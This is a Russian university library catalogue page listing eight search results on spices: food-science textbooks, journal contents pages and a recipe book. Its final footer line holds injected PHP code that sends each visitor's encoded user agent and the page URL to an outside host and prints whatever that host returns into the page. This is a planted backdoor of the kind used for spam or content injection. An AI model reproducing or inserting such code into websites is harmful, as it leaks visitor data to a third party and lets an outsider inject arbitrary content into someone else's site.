Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

299 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Пряность")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Идентификационная и товарная экспертиза продуктов растительного происхождения [Текст] / Л. Г. Елисеева [и др.] ; ред. Л. Г. Елисеева, 2013. - 523 с.
Держатели документа (Информация об экземплярах) 

Рассматриваются теоретические основы идентификационной и товарной экспертизы продуктов растительного происхождения, в том числе зерномучных товаров, свежих плодов и овощей, вкусовых товаров, крахмала, сахара, меда и кондитерских товаров и др.

Особое внимание уделяется экспертизе генетически модифицированных пищевых продуктов растительного происхождения.

Для студентов, обучающихся по специальности «Товароведение», также специалистов торговли, работников таможенных и экспертных предприятий

2. 
Кондитерское и хлебопекарное производство. - Журнал, 2008г. № 1
Оглавление 
  • Использование соевого молока при производстве мучных изделий. - с.2-3
    Кл. слова: МОЛОКО СОЕВОЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Музыка, Л. А. Мягкие маргарины с длительным сроком годности для кулинарии и кондитерского производства / Л. А. Музыка. - с.4-6
    Кл. слова: МАРГАРИН
  • Тукачев, В. Е. Высокотемпературная сушка макаронных изделий / В. Е. Тукачев. - с.8-11
    Кл. слова: СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шамков, Ю. А. Проблемы качества зерновых смесей / Ю. А. Шамков. - с.12-14
    Кл. слова: ЗЕРНО
  • Конфеты ручной работы. - с.15-19
    Кл. слова: КОНФЕТЫ
  • Дубцов, Г. Г. Шафран: пряность известная и забытая / Г. Г. Дубцов. - с.20-21
    Кл. слова: ШАФРАН
  • Торт " Банановый". - с.22-23
    Кл. слова: ТОРТЫ
  • Производство изделий из слоеного теста. - с.24-26
    Кл. слова: ТЕСТО СЛОЕНОЕ, ИЗДЕЛИЯ КОНДИТЕРСКИЕ
Держатели документа (Информация об экземплярах) 
3. 
Питание и общество. - Журнал, 2013г. № 5
Оглавление 
  • Афукова, Н. Грили на современном предприятии питания / Н. Афукова. - с.14-15
    Кл. слова: ГРИЛЬ
  • Любина, Е. Все о супе / Е. Любина. - с.18-19
    Кл. слова: ЩИ
  • Любина, Е. Все о супе / Е. Любина. - с.18-19
    Кл. слова: ЩИ
  • Арефьева, Е. Пасхальная выпечка со всего света / Е. Арефьева. - с.20
    Кл. слова: КУХНЯ ПРАЗДНИЧНАЯ, ПАСХА - РЕЦЕПТЫ БЛЮД
  • Валерианелла, или полевой салат. - с.22
    Кл. слова: ПИТАНИЕ ЗДОРОВОЕ
  • Симонов, Г. Пальмовое масло: "за" и "против" / Г. Симонов. - с.23
    Кл. слова: ПИТАНИЕ - НАУКА, ЗДОРОВЬЕ ЧЕЛОВЕКА, МАСЛО ПАЛЬМОВОЕ
  • Груша в... земле. - с.26-27
    Кл. слова: ТОПИНАМБУР - ПИТАНИЕ
  • Арефьева, А. Асафетида - уникальная специя / А. Арефьева. - с.31
    Кл. слова: ПРЯНОСТЬ, ПРИПРАВА
4. 
Вытовтов, Анатолий Андреевич. Товароведение и экспертиза вкусовых товаров [Текст] / А. А. Вытовтов, 2013. - 574, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник написан с учетом требований Федерального закона "О техническом регулировании" общих и специальных технических регламентов, других нормативных документов. Рассмотрены потребительская ценность, классификация, основы технологии, фальсификация, требования к упаковке, маркировке, условиям хранения, требованиям к показателям качества и безопасности, оценка соответствия, экспертиза различных групп и видов вкусовых товаров.

Для студентов высших и средних профессиональных образовательных учреждений, обучающихся по специальности "Товароведение и экспертиза товаров", слушателей системы повышения квалификации, а также практических работников.

5. 
Мудрецова-Висс, Клавдия Алексеевна. Микробиология, санитария и гигиена [Текст] : Учебник гриф-МО / К. А. Мудрецова-Висс, В. П. Дедюхина, 2010. - 400 с.

Учебник состоит из трех взаимосвязанных частей: основы общей микробиологии (гл. 1-3); микробиология, санитария пищевых продуктов (гл.4-7) и основы гигиены и санитарии в торговле (гл. 8).

Приведены современные данные о морфологии и физиологии микроорганизмов, биохимических процессах, вызываемых ими, а также рассмотрено влияние экологических факторов на микрофлору, развивающуюся в продуктах питания при транспортировании, хранении, реализации и переработке сырья. Показана роль микроорганизмов в процессе формирования и изменения качества пищевых продуктов и возникновения ряда заболеваний, вызываемых патогенными и условно-патогенными видами. Применительно к профилю специальности изложены микробиологические процессы, приводящие к понижению качества и потерям ценности пищевых продуктов. Рекомендованы пути, способы и мероприятия, позволяющие предотвратить эти процессы или значительно уменьшить их. Рассмотрены основные санитарно-эпидемиологические требования к предприятиям торговли и обороту в них продовольственного сырья и пищевых продуктов.

Предназначен для студентов высших учебных заведений, аспирантов, преподавателей и практических работников.

6. 
Товароведение и экспертиза потребительских товаров [Текст] : учеб. для торговых учеб. заведений / И. А. Ермилова [и др.], 2007. - 542, [1] с.

В учебнике изложены предмет и задачи, теоретические основы товароведения, классификация, химический состав, пищевая ценность отдельных групп товаров. Даны современные особенности технологии отечественных и импортных продуктов. Особое внимание уделяется сертификации и проведению экспертизы товаров растительного и животного происхождения.

7. 
Артюхова, Светлана Ивановна. Основы пищевой биотехнологии и нанотехнологии [Текст] : учеб. пособие / С. И. Артюхова, Ю. А. Гаврилова, 2010. - 310 с.
Оглавление 
  • Введение. - с.6
  • Питание человека. Общие положения. - с.8
  • Роль пищи для организма человека. - с.8
  • Теория питания. - с.9
  • Физиология пищеварения. - с.28
  • Пищевой рацион современного человека. - с.39
  • Основные нарушения питания и их влияние на здоровье. - с.40
  • Контрольные вопросы. - с.42
  • Характеристика важнейших компонентов пищи. - с.43
  • Белки. - с.43
  • Характеристика белков. - с.45
  • Функциональные свойства белка. - с.46
  • Превращение белков при производстве пищевых продуктов. - с.51
  • Липиды. - с.54
  • Характеристики липидов. - с.54
  • Функциональные свойства липидов. - с.57
  • Превращение липидов при производстве пищевых продуктов. - с.60
  • Углеводы. - с.64
  • Характеристика углеводов. - с.64
  • Физиологическое значение углеводов. - с.68
  • Превращение углеводов при производстве пищевых продуктов. - с.70
  • Минеральные вещества. - с.73
  • Характеристика минеральных веществ. - с.73
  • Физиологическое значение минеральных веществ для организма человека. - с.75
  • Влияние технологической обработки на витаминный состав пищевых продуктов. - с.94
  • Ферменты. - с.97
  • Характеристика ферментов. - с.97
  • Применение ферментных препаратов в пищевых биотехнологиях. - с.104
  • Вода. - с.106
  • Характеристика воды. - с.106
  • Свободная и связанная влага в пищевых продуктах. - с.109
  • Активность воды. - с.111
  • Контрольные вопросы. - с.113
  • Пищевые добавки. - с.114
  • Характеристика и классификация пищевых добавок. - с.114
  • Гигиеническая регламентация пищевых добавок в продуктах питания. - с.117
  • Характеристика некоторых пищевых добавок. - с.120
  • Ароматизаторы. - с.120
  • Красители. - с.123
  • Подсластители. - с.132
  • Пряности. - с.136
  • Специи. - с.144
  • Пищевые кислоты. - с.158
  • Контрольные вопросы. - с.163
  • Биологически активные добавки. - с.164
  • Биологически активные добавки. - с.164
  • Эубиотики - биологически активные вещества для здоровья. - с.169
  • Пробиотики. - с.170
  • Пребиотики. - с.186
  • Синбиотики. - с.201
  • Контрольные вопросы. - с.204
  • Научные основы биотехнологии современных продуктов питания. - с.205
  • Теоретические принципы конструирования и проектирования продуктов питания. - с.205
  • Проектирование состава и свойств функциональных продуктов питания. - с.208
  • Получение пищевых продуктов, ингредиентов, материалов на основе биокаталических процессов обработки коллагенсодержащих животных тканей. - с.215
  • Современные физические методы обработки молочного сырья и пути их использования в производстве функциональных продуктов питания. - с.217
  • Инновационные методы в производстве функциональных продуктов на основе последних достижений науки и техники. - с.223
  • Основные направления пищевых нанотехнологий . - с.227
  • Нанонутриенты. - с.229
  • Наноструктурированные пищевые продукты. - с.230
  • Наноинкапсулированные пищевые вещества. - с.231
  • Нанотранспортные системы, биологически активные добавки к пище и пищевые добавки. - с.234
  • Особенности применения нанотехнологий в молочной промышленности. - с.235
  • Нанотехнологии в пастеризации молока. Низкотемпературные пастеризаторы с инфракрасным нагревом. - с.240
  • Применение нанотехнологий в других отраслях пищевой промышленности. - с.243
  • Применение нанотехнологии при производстве упаковочных материалов для пищевых продуктов и материалов, контактирующих с ними. - с.246
  • Проблемы контроля и оценки безопасности искусственных наноматериалов в составе пищевых продуктов. - с.252
  • Контрольные вопросы. - с.263
  • Искусственная и генномодифицированная пища. - с.264
  • Искусственная пища. - с.364
  • Генетически модифицированные продукты. - с.266
  • Контрольные вопросы. - с.277
  • Заключение. - с.278
  • Библиографический список. - с.279
  • Предметный указатель. - с.300
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основы пищевой биотехнологии и нанотехнологии.

Полный текст
8. 
Эткер Пряная зелень [Текст] : [Рецепты] / Эткер, 1994. - 91 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2785 - 24.01.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.16 запросов, 0.76c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;